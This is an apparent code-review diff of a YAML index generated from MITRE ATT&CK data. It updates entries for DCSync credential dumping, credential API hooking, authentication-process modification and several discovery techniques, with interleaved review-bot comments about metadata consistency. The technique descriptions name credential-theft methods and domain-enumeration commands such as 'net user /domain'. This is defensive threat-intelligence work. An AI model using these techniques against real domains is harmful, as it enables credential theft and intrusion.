- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
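Review bot: besides the T1558.003 reference reorder, this hunk removes the entire T1003.006 object body (platforms, the ExtraHop and Vincent Le Toux contributors, `id`, `created`, and thirteen `external_references` entries) which is re-added in the following hunk; the re-added list visible there stops after `Microsoft NRPC Dec 2017`, so the tail should be checked against the removed entries before merging. One change in this hunk is content rather than reordering and deserves a line in the commit message: the Harmj0y Kerberoast reference moves from `https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/` to `https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/` with its Retrieved date updated to September 23, 2024.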
@@ -49307,26 +49969,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
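Review bot: the rebuilt external_references list for T1003.006 carries duplicate sources: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both point at https://adsecurity.org/?p=1729 (differing only in retrieval date), and `Harmj0y DCSync Sept 2015` and `Harmj0y Mimikatz and DCSync` both point at the same harmj0y post (one over http://www.harmj0y.net, one over https://blog.harmj0y.net). If this block is regenerated verbatim from upstream ATT&CK STIX, that duplication is inherited and should not be hand-edited here; if the file is maintained by hand, keep one entry per source and confirm every `(Citation: ...)` key still used in the description and x_mitre_detection text (DRSR, GetNCCChanges, Samba DRSUAPI, Wine API samlib.dll, NRPC, SAMR, AdSecurity DCSync Sept 2015, Harmj0y DCSync Sept 2015) still resolves to a remaining entry.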
@@ -49339,6 +50063,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -49375,17 +50100,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
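Review bot: the platform list for T1556 replaces `Azure AD`, `Google Workspace` and `Office 365` with `Office Suite` and `Identity Provider` (with x_mitre_version bumped 2.4 to 2.5), so any index, filter or test selector keyed on the old platform strings will silently stop matching this technique. The same substitution appears for T1069 and T1069.003 further down; check that every platform-scoped index in the repo is regenerated in this same change rather than left referring to the retired names.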
@@ -49431,81 +50156,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
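Review bot: the removal of `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` at the end of the T1556 object is a move rather than a deletion (the same two keys are added near the top of the object in the two hunks above), but `spec_version: '2.1'` is removed here with no counterpart anywhere in the diff. If this file is consumed as STIX 2.1, `spec_version` is a required property on every object, so confirm that dropping it across the file is intentional and not a side effect of the serializer; the same silent drop recurs for T1552.007, T1033, T1613, T1615, T1652, T1087.002, T1087.001, T1497.001, T1069.002, T1007, T1040, T1135, T1120 and T1010 below.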
@@ -49518,28 +50172,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ created: '2020-02-11T19:01:15.930Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
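Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is dropped from T1056.004 with no replacement field in the rebuilt block, so the only record of the privilege level this technique needs disappears from the object; the same field is removed from T1003.006 above but retained for T1556.004 and T1016.001 below. Either the field is being retired, in which case those two objects should lose it in the same change, or it is being lost here by accident; worth stating which in the commit message. The explicit `revoked: false` and `x_mitre_deprecated: false` additions are fine and make the object easier to filter.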
@@ -49596,9 +50316,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -49629,7 +50348,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
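Review bot: the `modified` timestamp for T1556.004 moves backwards, from 2022-05-11 to 2021-12-14, and the same regression appears for T1613, T1016.001, T1615, T1652, T1069.002, T1007 and T1120 further down. Every old value being replaced shares the same `T14:00:00.188Z` time of day, which looks like a batch-assigned placeholder rather than a real edit time, so the new values are probably the genuine upstream ones; but any consumer that uses `modified` to decide whether an object is newer than a cached copy will treat these as older and skip them. Confirm the regression is expected and that no sync or cache logic compares `modified` that way.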
@@ -49653,8 +50372,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
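Review bot: this hunk deletes `x_mitre_attack_spec_version: 2.1.0` from T1556.004 with nothing added in its place, whereas the other objects touched in this diff have the key bumped to 3.2.0 (T1003.006, T1556, T1056.004, T1552.007, T1069, T1069.003, T1010, T1082), so T1556.004 ends up with no spec version at all; T1016.001 (`@@ -49825,13 +50540,11 @@`) gets the same treatment. If the intent is that objects not updated upstream keep 2.1.0, the key should be retained; if the intent is 3.2.0 everywhere, both objects need a `+ x_mitre_attack_spec_version: 3.2.0` line.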
@@ -49719,12 +50436,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -49783,7 +50499,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -49804,7 +50519,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -49825,13 +50540,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -49854,15 +50567,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -49888,13 +50600,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49919,12 +50630,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -49966,13 +50676,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -50033,12 +50742,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -50102,19 +50810,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
